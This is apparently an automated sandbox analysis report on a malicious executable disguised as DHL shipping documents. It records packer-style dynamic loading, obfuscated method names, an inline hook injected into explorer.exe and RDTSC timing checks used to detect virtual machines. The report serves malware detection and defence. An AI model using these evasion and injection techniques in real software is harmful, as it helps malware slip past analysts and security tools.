Source: 3.2.explorer.exe.1070f840.0.raw.unpack, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 4.2.explorer.exe.568f840.3.raw.unpack, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: DHL_Shipping_Documents.exe, Form1.cs	.Net Code: LateBinding.LateCall((object)method, (Type)null, "Invoke", new object[2] { 0, array }, (string[])null, (bool[])null)
Source: 3.2.explorer.exe.1070f840.0.raw.unpack, Form1.cs	.Net Code: LateBinding.LateCall((object)method, (Type)null, "Invoke", new object[2] { 0, array }, (string[])null, (bool[])null)
Source: 4.2.explorer.exe.568f840.3.raw.unpack, Form1.cs	.Net Code: LateBinding.LateCall((object)method, (Type)null, "Invoke", new object[2] { 0, array }, (string[])null, (bool[])null)

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_015EB2D1 push 14418B01h; ret	0_2_015EB2E3
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_015EB480 push 18418B01h; ret	0_2_015EB6E3
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 0_2_05BEAA1D push FFFFFF8Bh; iretd	0_2_05BEAA1F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041E913 push ED4CF45Fh; ret	2_2_0041E934
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00417285 push edx; ret	2_2_004172A0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041EB58 push cs; ret	2_2_0041EB59
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0040E322 push esp; iretd	2_2_0040E324
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041E388 push cs; iretd	2_2_0041E389
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041D4B5 push eax; ret	2_2_0041D508
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041D56C push eax; ret	2_2_0041D572
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041D502 push eax; ret	2_2_0041D508
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0041D50B push eax; ret	2_2_0041D572
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_00417663 pushad ; retf	2_2_00417683
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0040C7AD pushf ; retf	2_2_0040C7AF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A227F pushad ; retn 0006h	2_2_014A27EF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A227C pushad ; retn 0006h	2_2_014A27EF
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A27FF pushad ; retf 0006h	2_2_014A2835
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D090D push ecx; mov dword ptr [esp], ecx	2_2_014D0916
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A2838 pushad ; retf 0006h	2_2_014A2835
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014AAFF2 push es; iretd	2_2_014AAFF9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014A9931 push es; iretd	2_2_014A9938
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7B6B1E push esp; retn 0000h	3_2_0E7B6B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7B6B02 push esp; retn 0000h	3_2_0E7B6B03
Source: C:\Windows\explorer.exe	Code function: 3_2_0E7B69B5 push esp; retn 0000h	3_2_0E7B6AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0E9019B5 push esp; retn 0000h	3_2_0E901AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_0E901B1E push esp; retn 0000h	3_2_0E901B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0E901B02 push esp; retn 0000h	3_2_0E901B03
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_051427FF pushad ; retf 0006h	4_2_05142835
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0514227C pushad ; retn 0006h	4_2_051427EF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0514227F pushad ; retn 0006h	4_2_051427EF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4_2_0514AFF2 push es; iretd	4_2_0514AFF9

Source: DHL_Shipping_Documents.exe

Static PE information: 0x89CE9F62 [Tue Apr 7 11:43:30 2043 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.771936955689464

Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, dEhUkYEmBg876ioypIA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tW4WMD3QvK', 'sh4Wr0Hllt', 'DhBWKEkUoV', 'rcKWseMVCF', 'UF9W2whtVn', 'dy2Wde9w2E', 'jJgWIGSyp8'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, S5T0jhEDpOHiCGmnT49.cs	High entropy of concatenated method names: 'IthbpJd0b3', 'z4xbQmOxFw', 'EcTbAnOjgO', 'qb5bVIuXsV', 'QGJb9ZhFGf', 'cv9bkcIeUQ', 'PLBbYy4v5p', 'YaybuheYt6', 'nACbiHdppF', 'puebhdPu7Q'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, jFN1sUe01LmOH0la4e.cs	High entropy of concatenated method names: 'iXgXuB7KW6', 'W0aXi4MC6k', 'MyBXNW36y6', 'V0oXZA30dV', 'W3jX6ImZeN', 'fakXlanNZv', 'Pu6Xn5JZan', 'savXa4OuNx', 'DCwXo4cSXr', 'cUUXHTBWMq'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, pJUPuPRCo5119WD0ms.cs	High entropy of concatenated method names: 'x0OAl1lw6', 'JNdV5m5un', 'l0AkLftH2', 'cpUYopvb3', 'QiJi2HbXi', 'GDJh8FISy', 'CWXEbdqscbg0BNdXjK', 'caotCTnT0ajujjNGqk', 'A5Nteu2QT', 'UySWphv1D'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, z4cmCmzWIphEv4R6bA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ndtbXsmixb', 'LcpbGT9KvU', 'OxEb4nA2KI', 'uEcbSh244E', 'PlUbtrioMJ', 'CEebbepuFW', 'Un2bWyTQSL'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, clsw9vnr2A5JogEqA1.cs	High entropy of concatenated method names: 'Ravx7xtR8k', 'WY7xvTVPeW', 'tFXxcHNBv2', 'gN6cgqFDAI', 'meqcz34PjA', 'w17xD3muP1', 'dCZxEPZqpU', 'FLxxRlcn6q', 'lXixmWedMP', 'N44xB9rM9T'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, jTRFl3UrXDpeYcbQuE.cs	High entropy of concatenated method names: 'vgvxpFmtMY', 'KEBxQGh9Cu', 'K87xAuvdJY', 'fUNxVEmjjh', 'tLhx9kJNWr', 'E4JxkM7q17', 'GykxYQL2ZN', 'NILxuNwplj', 'uSaxiCtFO0', 'eXkxhB2y8G'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, gQhy2HB04KiVwLMXbU.cs	High entropy of concatenated method names: 'XNHEx2n8I0', 'Y1sEFZG7ev', 'dK5EqnJJqM', 'mSpE8B6roH', 'uKfEGBWCbP', 'YfgE4AOeGr', 'e0aNDpy8Gs3hn7r62u', 'dGnAfGSZvCt5JGvgxS', 'FyoEEj5dlf', 'VrnEm5DR30'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, IroH89huoCvEKJKfBW.cs	High entropy of concatenated method names: 'ekcP9YMKkM', 'QDKPYW4aLF', 'Hd3v3nbKhp', 'LAFv6j2dkT', 'SRuvlLkyNd', 'AuOv5ANSnM', 'wG6vnOdhVa', 'bV0vahejLi', 'wojvUChjmm', 'buMvo9iB5C'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, O2n8I0uT1sZG7evwiU.cs	High entropy of concatenated method names: 'r5JCMtbrmb', 'QuOCr2G04R', 'iL3CKsJGFW', 'RI2Cstnnjy', 'AbhC2JMDEv', 'ewfCdvlJZQ', 'gxvCIwcHcH', 'V3GCj78fcy', 'qpUCT3b9u1', 'kcNCgviEtN'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, vaBJGhTPyMsbjyI7Jk.cs	High entropy of concatenated method names: 'ohStNxlIOh', 'kjmtZe6CZh', 'SuCt3BEK3L', 'ljkt6FqhYX', 'VRLtMxcOdr', 'pDxtl7mYqL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, nAG9mJd2qMbujCkYOp.cs	High entropy of concatenated method names: 'fqNSjRj3yY', 'OTWSgiTfay', 'quvtDO5Qih', 'KsFtEkBWJF', 'qfgSHYAeI7', 'V9US1Lj24e', 'cAXSeMbAgG', 'iB5SMmxKOV', 'lHDSrpfVVf', 'xpNSKQ3TWL'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, kIouRysA5XDFlPrfOC.cs	High entropy of concatenated method names: 'MvESqlW9jB', 'nTpS8syVAX', 'ToString', 'q2jS7hxfTV', 'YIKSCm8TLJ', 'VTkSvUSRUX', 'jVBSPRdb6v', 'rmJScQGeVm', 'lJiSxKVjts', 'apjSFImDk5'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, vpQZ1GgmfbI4OvBt3u.cs	High entropy of concatenated method names: 'nSjbEVWSMj', 'Sk7bmK6w1T', 'acxbBoEbE7', 'XLnb7qsUFq', 'yLCbCCX5Nl', 'A3abPS2gun', 'KnAbcFmOay', 'igWtIjIYUn', 'v96tjOA3eX', 'aiWtT7M4Wo'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, gbPgfgNAOeGr9wBC64.cs	High entropy of concatenated method names: 'jW4cfIGFgB', 'TxwcCVkpEc', 'CMMcPnsyor', 'u2dcxbc3yx', 'IEYcFD2oqM', 'eFdP2RJiSn', 'otkPdVOGbo', 'O5xPILcLct', 'Oa4PjUtFHr', 'oVsPTXxSTW'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, nt0MNdjuD4Lg0QAlP7.cs	High entropy of concatenated method names: 'Wi8t7udMWZ', 'QjutCjCUcC', 'Fx1tvtJwRR', 'r3FtPKwriO', 'WrhtcVQNGM', 'KOjtxPWuuK', 'yMhtFjTO4Z', 'PmTtwVM9uA', 'NCDtqWjr3s', 'f6tt8UGq9U'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, TRr2mrC99tDKqLOHqt.cs	High entropy of concatenated method names: 'Dispose', 'KoIETVyOHJ', 'LEqRZ4SV3g', 'nvBhhd9KgV', 'NXtEg0MNdu', 'a4LEzg0QAl', 'ProcessDialogKey', 'i70RDaBJGh', 'hyMREsbjyI', 'fJkRR0pQZ1'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, VbtFCsKIT0sW0qntrD.cs	High entropy of concatenated method names: 'ToString', 'g8d4H3yo6k', 'n7x4Z8jtZB', 'kSo436PS2q', 'KLP46sRIgn', 'wZV4lMfGpA', 'RQG45O8hfC', 'YpV4nBFGqy', 'MuX4akH0pQ', 'GtM4Ub02Ld'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, lOsTRfMQeYTtNmNiRp.cs	High entropy of concatenated method names: 'e1AGoV9MJ5', 'ebEG1FnmQ9', 'lO1GM9w8vq', 'xd8GrtaiQL', 'oMeGZmQrUv', 'F7OG3QuIXQ', 'eHGG6DWKwq', 'n2rGlAKcb3', 'CSPG5qoIDW', 'KloGnCqt2R'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, Jh9TYBiK5nJJqM8SpB.cs	High entropy of concatenated method names: 'r8bvV6vkGs', 'v0Nvk58Cxy', 'UwPvu0vAnA', 'Ed8vinUJf0', 'xFGvGBAJox', 'Ramv4iqVKX', 'retvSBcvKX', 'X48vtMQIWj', 'oDuvbtqWkJ', 'kj4vWC63iT'
Source: 0.2.DHL_Shipping_Documents.exe.8840000.11.raw.unpack, Es8cNYFEtWAbd7GldL.cs	High entropy of concatenated method names: 'u4TmfdETR4', 'Nqbm7R1uZq', 'hbVmCHHUCL', 'uQOmvHdhMP', 'nX3mPJwOms', 'u2jmc0ThWw', 'fR6mxILIpD', 'xjMmFSqood', 'BvemwpsXXL', 'HhxmqHgIkx'
Source: 0.2.DHL_Shipping_Documents.exe.302836c.7.raw.unpack, WfMWUERY39pMH0yd70.cs	High entropy of concatenated method names: 'G0JaqYc5w', 'In9MC0ZST', 'P5Ov9AJLy', 'XfYjIBy7k', 'gvKVOkpnF', 'gIuqM6vhK', 'xDRfUQnwU', 'zdae1fpA1', 't6VdtqbPb', 'urGGKedp7'
Source: 0.2.DHL_Shipping_Documents.exe.302836c.7.raw.unpack, bO0Jy0i8t0tvCjxh4N.cs	High entropy of concatenated method names: 'A09E2gJpD', 'U1345pluG', 'A8bA3TYHE', 'fURXv46eT', 'Y62CtJ1DE', 'gOY2JpS0V', 'FLlrC9wZoG7xXy76OV', 'uskfJrI1kgMCkPKthF', 'E8L8PguYG', 'Add'
Source: 0.2.DHL_Shipping_Documents.exe.2feeb40.0.raw.unpack, WfMWUERY39pMH0yd70.cs	High entropy of concatenated method names: 'G0JaqYc5w', 'In9MC0ZST', 'P5Ov9AJLy', 'XfYjIBy7k', 'gvKVOkpnF', 'gIuqM6vhK', 'xDRfUQnwU', 'zdae1fpA1', 't6VdtqbPb', 'urGGKedp7'
Source: 0.2.DHL_Shipping_Documents.exe.2feeb40.0.raw.unpack, bO0Jy0i8t0tvCjxh4N.cs	High entropy of concatenated method names: 'A09E2gJpD', 'U1345pluG', 'A8bA3TYHE', 'fURXv46eT', 'Y62CtJ1DE', 'gOY2JpS0V', 'FLlrC9wZoG7xXy76OV', 'uskfJrI1kgMCkPKthF', 'E8L8PguYG', 'Add'
Source: 0.2.DHL_Shipping_Documents.exe.5700000.9.raw.unpack, WfMWUERY39pMH0yd70.cs	High entropy of concatenated method names: 'G0JaqYc5w', 'In9MC0ZST', 'P5Ov9AJLy', 'XfYjIBy7k', 'gvKVOkpnF', 'gIuqM6vhK', 'xDRfUQnwU', 'zdae1fpA1', 't6VdtqbPb', 'urGGKedp7'
Source: 0.2.DHL_Shipping_Documents.exe.5700000.9.raw.unpack, bO0Jy0i8t0tvCjxh4N.cs	High entropy of concatenated method names: 'A09E2gJpD', 'U1345pluG', 'A8bA3TYHE', 'fURXv46eT', 'Y62CtJ1DE', 'gOY2JpS0V', 'FLlrC9wZoG7xXy76OV', 'uskfJrI1kgMCkPKthF', 'E8L8PguYG', 'Add'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, dEhUkYEmBg876ioypIA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tW4WMD3QvK', 'sh4Wr0Hllt', 'DhBWKEkUoV', 'rcKWseMVCF', 'UF9W2whtVn', 'dy2Wde9w2E', 'jJgWIGSyp8'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, S5T0jhEDpOHiCGmnT49.cs	High entropy of concatenated method names: 'IthbpJd0b3', 'z4xbQmOxFw', 'EcTbAnOjgO', 'qb5bVIuXsV', 'QGJb9ZhFGf', 'cv9bkcIeUQ', 'PLBbYy4v5p', 'YaybuheYt6', 'nACbiHdppF', 'puebhdPu7Q'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, jFN1sUe01LmOH0la4e.cs	High entropy of concatenated method names: 'iXgXuB7KW6', 'W0aXi4MC6k', 'MyBXNW36y6', 'V0oXZA30dV', 'W3jX6ImZeN', 'fakXlanNZv', 'Pu6Xn5JZan', 'savXa4OuNx', 'DCwXo4cSXr', 'cUUXHTBWMq'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, pJUPuPRCo5119WD0ms.cs	High entropy of concatenated method names: 'x0OAl1lw6', 'JNdV5m5un', 'l0AkLftH2', 'cpUYopvb3', 'QiJi2HbXi', 'GDJh8FISy', 'CWXEbdqscbg0BNdXjK', 'caotCTnT0ajujjNGqk', 'A5Nteu2QT', 'UySWphv1D'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, z4cmCmzWIphEv4R6bA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ndtbXsmixb', 'LcpbGT9KvU', 'OxEb4nA2KI', 'uEcbSh244E', 'PlUbtrioMJ', 'CEebbepuFW', 'Un2bWyTQSL'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, clsw9vnr2A5JogEqA1.cs	High entropy of concatenated method names: 'Ravx7xtR8k', 'WY7xvTVPeW', 'tFXxcHNBv2', 'gN6cgqFDAI', 'meqcz34PjA', 'w17xD3muP1', 'dCZxEPZqpU', 'FLxxRlcn6q', 'lXixmWedMP', 'N44xB9rM9T'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, jTRFl3UrXDpeYcbQuE.cs	High entropy of concatenated method names: 'vgvxpFmtMY', 'KEBxQGh9Cu', 'K87xAuvdJY', 'fUNxVEmjjh', 'tLhx9kJNWr', 'E4JxkM7q17', 'GykxYQL2ZN', 'NILxuNwplj', 'uSaxiCtFO0', 'eXkxhB2y8G'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, gQhy2HB04KiVwLMXbU.cs	High entropy of concatenated method names: 'XNHEx2n8I0', 'Y1sEFZG7ev', 'dK5EqnJJqM', 'mSpE8B6roH', 'uKfEGBWCbP', 'YfgE4AOeGr', 'e0aNDpy8Gs3hn7r62u', 'dGnAfGSZvCt5JGvgxS', 'FyoEEj5dlf', 'VrnEm5DR30'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, IroH89huoCvEKJKfBW.cs	High entropy of concatenated method names: 'ekcP9YMKkM', 'QDKPYW4aLF', 'Hd3v3nbKhp', 'LAFv6j2dkT', 'SRuvlLkyNd', 'AuOv5ANSnM', 'wG6vnOdhVa', 'bV0vahejLi', 'wojvUChjmm', 'buMvo9iB5C'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, O2n8I0uT1sZG7evwiU.cs	High entropy of concatenated method names: 'r5JCMtbrmb', 'QuOCr2G04R', 'iL3CKsJGFW', 'RI2Cstnnjy', 'AbhC2JMDEv', 'ewfCdvlJZQ', 'gxvCIwcHcH', 'V3GCj78fcy', 'qpUCT3b9u1', 'kcNCgviEtN'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, vaBJGhTPyMsbjyI7Jk.cs	High entropy of concatenated method names: 'ohStNxlIOh', 'kjmtZe6CZh', 'SuCt3BEK3L', 'ljkt6FqhYX', 'VRLtMxcOdr', 'pDxtl7mYqL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, nAG9mJd2qMbujCkYOp.cs	High entropy of concatenated method names: 'fqNSjRj3yY', 'OTWSgiTfay', 'quvtDO5Qih', 'KsFtEkBWJF', 'qfgSHYAeI7', 'V9US1Lj24e', 'cAXSeMbAgG', 'iB5SMmxKOV', 'lHDSrpfVVf', 'xpNSKQ3TWL'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, kIouRysA5XDFlPrfOC.cs	High entropy of concatenated method names: 'MvESqlW9jB', 'nTpS8syVAX', 'ToString', 'q2jS7hxfTV', 'YIKSCm8TLJ', 'VTkSvUSRUX', 'jVBSPRdb6v', 'rmJScQGeVm', 'lJiSxKVjts', 'apjSFImDk5'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, vpQZ1GgmfbI4OvBt3u.cs	High entropy of concatenated method names: 'nSjbEVWSMj', 'Sk7bmK6w1T', 'acxbBoEbE7', 'XLnb7qsUFq', 'yLCbCCX5Nl', 'A3abPS2gun', 'KnAbcFmOay', 'igWtIjIYUn', 'v96tjOA3eX', 'aiWtT7M4Wo'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, gbPgfgNAOeGr9wBC64.cs	High entropy of concatenated method names: 'jW4cfIGFgB', 'TxwcCVkpEc', 'CMMcPnsyor', 'u2dcxbc3yx', 'IEYcFD2oqM', 'eFdP2RJiSn', 'otkPdVOGbo', 'O5xPILcLct', 'Oa4PjUtFHr', 'oVsPTXxSTW'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, nt0MNdjuD4Lg0QAlP7.cs	High entropy of concatenated method names: 'Wi8t7udMWZ', 'QjutCjCUcC', 'Fx1tvtJwRR', 'r3FtPKwriO', 'WrhtcVQNGM', 'KOjtxPWuuK', 'yMhtFjTO4Z', 'PmTtwVM9uA', 'NCDtqWjr3s', 'f6tt8UGq9U'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, TRr2mrC99tDKqLOHqt.cs	High entropy of concatenated method names: 'Dispose', 'KoIETVyOHJ', 'LEqRZ4SV3g', 'nvBhhd9KgV', 'NXtEg0MNdu', 'a4LEzg0QAl', 'ProcessDialogKey', 'i70RDaBJGh', 'hyMREsbjyI', 'fJkRR0pQZ1'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, VbtFCsKIT0sW0qntrD.cs	High entropy of concatenated method names: 'ToString', 'g8d4H3yo6k', 'n7x4Z8jtZB', 'kSo436PS2q', 'KLP46sRIgn', 'wZV4lMfGpA', 'RQG45O8hfC', 'YpV4nBFGqy', 'MuX4akH0pQ', 'GtM4Ub02Ld'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, lOsTRfMQeYTtNmNiRp.cs	High entropy of concatenated method names: 'e1AGoV9MJ5', 'ebEG1FnmQ9', 'lO1GM9w8vq', 'xd8GrtaiQL', 'oMeGZmQrUv', 'F7OG3QuIXQ', 'eHGG6DWKwq', 'n2rGlAKcb3', 'CSPG5qoIDW', 'KloGnCqt2R'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, Jh9TYBiK5nJJqM8SpB.cs	High entropy of concatenated method names: 'r8bvV6vkGs', 'v0Nvk58Cxy', 'UwPvu0vAnA', 'Ed8vinUJf0', 'xFGvGBAJox', 'Ramv4iqVKX', 'retvSBcvKX', 'X48vtMQIWj', 'oDuvbtqWkJ', 'kj4vWC63iT'
Source: 0.2.DHL_Shipping_Documents.exe.4354db0.8.raw.unpack, Es8cNYFEtWAbd7GldL.cs	High entropy of concatenated method names: 'u4TmfdETR4', 'Nqbm7R1uZq', 'hbVmCHHUCL', 'uQOmvHdhMP', 'nX3mPJwOms', 'u2jmc0ThWw', 'fR6mxILIpD', 'xjMmFSqood', 'BvemwpsXXL', 'HhxmqHgIkx'

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE7

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: DHL_Shipping_Documents.exe PID: 4496, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000030C9904 second address: 00000000030C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
